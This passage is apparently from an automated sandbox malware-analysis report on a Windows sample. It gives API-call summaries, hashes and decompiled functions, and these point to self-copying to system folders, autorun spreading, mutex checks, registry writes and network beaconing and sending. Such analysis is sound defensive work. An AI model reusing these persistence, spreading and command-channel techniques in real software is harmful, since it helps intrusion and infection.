                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rot13$File$add_system_direcroty$Create$AttributesCloseCopyErrorGet_HandleLastMutexReg_WriteWrite_copy_autoinfcopy_filezfiletytmutex_checksss_ranswsprintf
                                                                          • String ID:
                                                                          • API String ID: 2813818644-0
                                                                          • Opcode ID: 093c64d432fdb6e2285a5a98a3c5134fac210d630f0c210cb98ae6cf3dcb151b
                                                                          • Instruction ID: e12c022bba1e22a18cbfb1e123279ba149248782693e9a4da0a20551277887d2
                                                                          • Opcode Fuzzy Hash: 093c64d432fdb6e2285a5a98a3c5134fac210d630f0c210cb98ae6cf3dcb151b
                                                                          • Instruction Fuzzy Hash: EAB0920CA0010403F000F2B8194BB0D704C9B51598F404031A5409118AAC44B42882B7
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d63655d2dcbc60839257c6e938d84bfe055410ba38a70233d950f78cf1ccbd3a
                                                                          • Instruction ID: f1047de20eb3893e32fccaf0b86581f2c31394c201b131b44f92a60914293b21
                                                                          • Opcode Fuzzy Hash: d63655d2dcbc60839257c6e938d84bfe055410ba38a70233d950f78cf1ccbd3a
                                                                          • Instruction Fuzzy Hash: F12174B09043594BCB10DF29C89439EBBB4EF84310F00C5BFD95997381D7349A898FA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • malloc.MSVCRT ref: 100010BE
                                                                            • Part of subcall function 10001000: ??3@YAXPAX@Z.MSVCRT ref: 10001043
                                                                            • Part of subcall function 10001000: fflush.MSVCRT ref: 10001057
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ??3@fflushmalloc
                                                                          • String ID:
                                                                          • API String ID: 3823167246-0
                                                                          • Opcode ID: b4ed8e0dcb01610a8e0155abcafffdc3cf178930a4c4465fac26594983f5d97f
                                                                          • Instruction ID: c3d61e731865bd7456064c518874042fb421375ce73593d0c675da1890093c8e
                                                                          • Opcode Fuzzy Hash: b4ed8e0dcb01610a8e0155abcafffdc3cf178930a4c4465fac26594983f5d97f
                                                                          • Instruction Fuzzy Hash: B5016135A043919BF711EFB8899178F7BD8FB442D0F118429E8808B24DDBB0E8808792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83
                                                                            • Part of subcall function 00405C6C: WriteFile.KERNEL32 ref: 00405CBE
                                                                            • Part of subcall function 00405C6C: WriteFile.KERNEL32 ref: 00405D35
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID:
                                                                          • API String ID: 148219782-0
                                                                          • Opcode ID: 72e9fedbf2843b56b6a6daafb9acc6cb085d47cfbc8d447e6dd53778901cb612
                                                                          • Instruction ID: 00d198e32dff6483e67d0ab4778baf528fffa47fc69d76bf6507d571ee69b3a3
                                                                          • Opcode Fuzzy Hash: 72e9fedbf2843b56b6a6daafb9acc6cb085d47cfbc8d447e6dd53778901cb612
                                                                          • Instruction Fuzzy Hash: 92F0E7B0509305ABE700AF75D1C930BBEE4AB40358F008A2DE4D55B2D2D7B99A488B96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 23%
                                                                          			E00401280() {
                                                                          				void* _t4;
                                                                          				intOrPtr* _t5;
                                                                          				intOrPtr* _t8;
                                                                          
                                                                          				 *_t8 = 1;
                                                                          				 *0x41949c();
                                                                          				E00401150();
                                                                          				_t5 = _t8;
                                                                          				 *((intOrPtr*)(_t8 - 8)) = 2;
                                                                          				 *0x41949c(_t4); // executed
                                                                          				E00401150(); // executed
                                                                          				_push(_t5);
                                                                          				goto __ecx;
                                                                          			}






                                                                          0x00401286
                                                                          0x0040128d
                                                                          0x00401293
                                                                          0x004012a1
                                                                          0x004012a6
                                                                          0x004012ad
                                                                          0x004012b3
                                                                          0x004012c0
                                                                          0x004012ca

                                                                          APIs
                                                                          • __set_app_type.MSVCRT ref: 0040128D
                                                                            • Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
                                                                            • Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119E
                                                                            • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D8
                                                                            • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FC
                                                                            • Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401210
                                                                            • Part of subcall function 00401150: __p__environ.MSVCRT ref: 0040122A
                                                                            • Part of subcall function 00401150: _cexit.MSVCRT ref: 0040124D
                                                                            • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401255
                                                                          • __set_app_type.MSVCRT ref: 004012AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: __set_app_type_setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 570162737-0
                                                                          • Opcode ID: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
                                                                          • Instruction ID: 752eb1ab21b4c19d55682f3c7b2bcf3a34383202cb890f95c9a90ba33a14ec6c
                                                                          • Opcode Fuzzy Hash: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
                                                                          • Instruction Fuzzy Hash: 02D09B354142149BC7007BF5DC0A399BBA86B09301F41443CE6CD67261D6743C4947DA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00401C63
                                                                          • memset.MSVCRT ref: 00401C81
                                                                          • _mbscat.MSVCRT ref: 00401C90
                                                                          • _mbscat.MSVCRT ref: 00401CCD
                                                                            • Part of subcall function 00405316: gethostname.WS2_32 ref: 0040532B
                                                                            • Part of subcall function 00405316: gethostbyname.WS2_32 ref: 00405336
                                                                            • Part of subcall function 00405316: inet_ntoa.WS2_32 ref: 00405351
                                                                          • _mbscat.MSVCRT ref: 00401D1B
                                                                            • Part of subcall function 00405256: GetVersionExA.KERNEL32 ref: 00405272
                                                                          • _mbscat.MSVCRT ref: 00401D49
                                                                          • _mbscat.MSVCRT ref: 00401D7D
                                                                          • Sleep.KERNEL32 ref: 00401E82
                                                                          • _mbscat.MSVCRT ref: 00401DD7
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          • send.WS2_32 ref: 00401EF2
                                                                          • recv.WS2_32 ref: 00401F2A
                                                                          • strtok.MSVCRT ref: 00401F89
                                                                          • strtok.MSVCRT ref: 00401FA8
                                                                          • closesocket.WS2_32 ref: 00401FBD
                                                                          • atoi.MSVCRT ref: 00401FD4
                                                                          • atoi.MSVCRT ref: 00401FEA
                                                                          • memset.MSVCRT ref: 00402043
                                                                          • lstrlen.KERNEL32 ref: 00402051
                                                                            • Part of subcall function 0040447C: CryptAcquireContextA.ADVAPI32 ref: 004044BD
                                                                            • Part of subcall function 0040447C: CryptCreateHash.ADVAPI32 ref: 004044F7
                                                                            • Part of subcall function 0040447C: CryptHashData.ADVAPI32 ref: 00404528
                                                                            • Part of subcall function 0040447C: CryptDestroyHash.ADVAPI32 ref: 0040453A
                                                                            • Part of subcall function 0040447C: CryptReleaseContext.ADVAPI32 ref: 00404550
                                                                          • lstrcmp.KERNEL32 ref: 004020AB
                                                                          • lstrcmp.KERNEL32 ref: 004020CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: _mbscat$Crypt$Hashmemset$Contextatoilstrcmpstrtok$AcquireConnectedCreateDataDestroyHandleInternetLibraryLoadModuleReleaseSleepStateVersionclosesocketgethostbynamegethostnameinet_ntoalstrlenrecvsend
                                                                          • String ID: -Age$3159$=-A$P$expl$nt: $ost:$wer
                                                                          • API String ID: 1488133686-2239103369
                                                                          • Opcode ID: 6c291d1ab130d950e73a0d21f9dfd0606c72a42a2e497424fde83289429f6f05
                                                                          • Instruction ID: 99ea3051cc31653010b65aed47ab6d4c6dbc815114f0d374468db723e332898a
                                                                          • Opcode Fuzzy Hash: 6c291d1ab130d950e73a0d21f9dfd0606c72a42a2e497424fde83289429f6f05
                                                                          • Instruction Fuzzy Hash: 79C186B48043148BD724AF29C58535A7BF1EF85318F2086AEE45C5B7D2CB798D86CF46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext_mbscat_mbscpylstrcpymemset
                                                                          • String ID: *.*$.$.$\
                                                                          • API String ID: 1316374366-446526362
                                                                          • Opcode ID: 26e3bcea411a8c7c4bbc4843d5bdfb40b3e1660c35f98ae57de979e8483c3eb5
                                                                          • Instruction ID: b4465dfa5f332ec533157c87ff7dca4d317d8e0d8912ef682c4f4d402bf95f8b
                                                                          • Opcode Fuzzy Hash: 26e3bcea411a8c7c4bbc4843d5bdfb40b3e1660c35f98ae57de979e8483c3eb5
                                                                          • Instruction Fuzzy Hash: 505194758083588ADB20AF35C48839DBFE5AF44315F1486BEE859673C1DB788F88CB46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 26%
                                                                          			E0040447C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				void* _v12;
                                                                          				void _v28;
                                                                          				long* _v32;
                                                                          				void* _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				int _v60;
                                                                          				int _v64;
                                                                          				int _v68;
                                                                          				int _v72;
                                                                          				char* _v76;
                                                                          				int _v80;
                                                                          				int _v84;
                                                                          				intOrPtr _v88;
                                                                          				int _v100;
                                                                          				intOrPtr _v104;
                                                                          				intOrPtr _v108;
                                                                          				int _v112;
                                                                          				char* _v116;
                                                                          				char* _v120;
                                                                          				intOrPtr _v124;
                                                                          				int _v128;
                                                                          				int _v132;
                                                                          				char* _v136;
                                                                          				void* _v140;
                                                                          				intOrPtr _v144;
                                                                          				signed int _v168;
                                                                          				intOrPtr _v172;
                                                                          				int _t54;
                                                                          				long* _t57;
                                                                          				int _t60;
                                                                          				intOrPtr _t76;
                                                                          				int _t79;
                                                                          				signed int _t82;
                                                                          				void* _t83;
                                                                          				intOrPtr* _t86;
                                                                          				void* _t88;
                                                                          				void* _t89;
                                                                          				intOrPtr* _t90;
                                                                          				intOrPtr* _t93;
                                                                          
                                                                          				_t76 = _a12;
                                                                          				asm("cld");
                                                                          				memset( &_v28, 0, 4 << 2);
                                                                          				_v60 = 0;
                                                                          				_v64 = 1;
                                                                          				_v68 = 0;
                                                                          				_v72 = 0;
                                                                          				_t54 = CryptAcquireContextA( &_v32);
                                                                          				_t86 = _t83 - 0x40 + 0xc - 0x14;
                                                                          				_t79 = 0;
                                                                          				if(_t54 != 0) {
                                                                          					_v76 =  &_v36;
                                                                          					_v80 = 0;
                                                                          					_v84 = 0;
                                                                          					_v88 = 0x8003;
                                                                          					_t57 = _v32;
                                                                          					 *_t86 = _t57;
                                                                          					L0040C4B0();
                                                                          					_t88 = _t86 - 0x14;
                                                                          					_t79 = 0;
                                                                          					if(_t57 != 0) {
                                                                          						_v100 = 0;
                                                                          						_v104 = _a8;
                                                                          						_v108 = _a4;
                                                                          						_t60 = _v36;
                                                                          						_v112 = _t60;
                                                                          						L0040C4B8();
                                                                          						_t89 = _t88 - 0x10;
                                                                          						if(_t60 != 0) {
                                                                          							_v40 = 4;
                                                                          							_v112 = 0;
                                                                          							_v116 =  &_v40;
                                                                          							_v120 =  &_v44;
                                                                          							_v124 = 4;
                                                                          							_v128 = _v36;
                                                                          							L0040C4D0();
                                                                          							_t90 = _t89 - 0x14;
                                                                          							_v132 = 0;
                                                                          							_v136 =  &_v44;
                                                                          							_v140 =  &_v28;
                                                                          							_v144 = 2;
                                                                          							 *_t90 = _v36;
                                                                          							L0040C4D0();
                                                                          							_v168 = _v36;
                                                                          							L0040C4C0();
                                                                          							_v168 = 0;
                                                                          							CryptReleaseContext(_v32);
                                                                          							_t93 = _t90 - 8;
                                                                          							_t82 = 0;
                                                                          							if(0 < _v44) {
                                                                          								do {
                                                                          									_v168 =  *( &_v28 + _t82) & 0x000000ff;
                                                                          									_v172 = "%2.2x";
                                                                          									 *_t93 = _t76 + _t82 * 2;
                                                                          									sprintf(??, ??);
                                                                          									_t82 = _t82 + 1;
                                                                          								} while (_t82 < _v44);
                                                                          							}
                                                                          							_t79 = 1;
                                                                          						} else {
                                                                          							_v128 = _v36;
                                                                          							L0040C4C0();
                                                                          							_v128 = 0;
                                                                          							CryptReleaseContext(_v32);
                                                                          							_t79 = 0;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t79;
                                                                          			}











































                                                                          0x00404484
                                                                          0x0040448a
                                                                          0x00404495
                                                                          0x00404497
                                                                          0x0040449f
                                                                          0x004044a7
                                                                          0x004044af
                                                                          0x004044bd
                                                                          0x004044c2
                                                                          0x004044c5
                                                                          0x004044cc
                                                                          0x004044d5
                                                                          0x004044d9
                                                                          0x004044e1
                                                                          0x004044e9
                                                                          0x004044f1
                                                                          0x004044f4
                                                                          0x004044f7
                                                                          0x004044fc
                                                                          0x004044ff
                                                                          0x00404506
                                                                          0x0040450c
                                                                          0x00404517
                                                                          0x0040451e
                                                                          0x00404522
                                                                          0x00404525
                                                                          0x00404528
                                                                          0x0040452d
                                                                          0x00404532
                                                                          0x00404562
                                                                          0x00404569
                                                                          0x00404574
                                                                          0x0040457b
                                                                          0x0040457f
                                                                          0x0040458a
                                                                          0x0040458d
                                                                          0x00404592
                                                                          0x00404595
                                                                          0x004045a0
                                                                          0x004045a7
                                                                          0x004045ab
                                                                          0x004045b6
                                                                          0x004045b9
                                                                          0x004045c4
                                                                          0x004045c7
                                                                          0x004045cf
                                                                          0x004045dd
                                                                          0x004045e2
                                                                          0x004045e5
                                                                          0x004045ed
                                                                          0x004045ef
                                                                          0x004045f4
                                                                          0x004045f8
                                                                          0x00404603
                                                                          0x00404606
                                                                          0x0040460b
                                                                          0x0040460c
                                                                          0x004045ef
                                                                          0x00404611
                                                                          0x00404534
                                                                          0x00404537
                                                                          0x0040453a
                                                                          0x00404542
                                                                          0x00404550
                                                                          0x00404558
                                                                          0x00404558
                                                                          0x00404532
                                                                          0x00404506
                                                                          0x0040461e

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Crypt$Hash$Context$DestroyParamRelease$AcquireCreateDatasprintf
                                                                          • String ID: %2.2x
                                                                          • API String ID: 3563044075-341615062
                                                                          • Opcode ID: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
                                                                          • Instruction ID: 71e90cb579b3012189f1bc8fcce2ad08a11f5a443b18af0431ecfa41047fce4e
                                                                          • Opcode Fuzzy Hash: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
                                                                          • Instruction Fuzzy Hash: 6A41A6B5904309DBDB00EF69C58579EBBF4BB84314F00892EE984A7381E779D548CFA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CountHeapProcessSleepTick$AllocateCurrentSocketinet_addrmemsetsendtosetsockopt
                                                                          • String ID:
                                                                          • API String ID: 3025670439-0
                                                                          • Opcode ID: 80d924af3c741b2fe8bc6792d036a4a53eb01d27bfc2d5dfb458dfe8975752fb
                                                                          • Instruction ID: c887a22924d357f2cc4e5641eb84b294b57a756f528ba2f64bcdc76ce2e57ac6
                                                                          • Opcode Fuzzy Hash: 80d924af3c741b2fe8bc6792d036a4a53eb01d27bfc2d5dfb458dfe8975752fb
                                                                          • Instruction Fuzzy Hash: EB5129B09043459BD700EFA8C18439EFBF1BF84314F108A3EE499AB785D7789459CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
